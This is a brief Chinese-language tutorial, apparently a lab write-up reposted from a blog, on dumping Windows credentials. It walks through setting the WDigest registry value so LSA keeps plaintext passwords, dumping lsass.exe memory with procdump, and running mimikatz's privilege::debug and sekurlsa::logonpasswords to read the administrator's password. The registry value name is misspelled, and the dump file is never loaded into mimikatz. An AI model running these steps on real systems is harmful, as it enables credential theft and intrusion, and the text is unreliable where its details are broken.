工具:
procdump & mimikatz
实验环境:
实验主机: win10
账户密码: 17 位复杂密码 (大小写 + 特殊字符 + 数字)
(虽然微软很早就更新了补丁来防止获取 Windows 的明文密码, 但是可以修改注册表...
使 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest 下的 UseLogonCredentiald 的键值为 1 即代表 WDigest 的密码支持明文形式保存在 LSA 内存中)
步骤:
使用 cmd 运行 procdump.exe
输入: Procdump.exe -accepteula -ma lsass.exe lsass.dmp
使用 cmd 运行 mimikatz.exe
输入: privilege::debug
sekurlsa::logonpasswords
在 wdigest: 下显示的就是管理员的密码
补充:
如果按照网上的教程在 mimikatz 输入指令这里 100% 报错
- (ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005))
- privilege::debug(提权)
- sekurlsa::logonpasswords(抓密码)
来源: http://www.bubuko.com/infodetail-3289668.html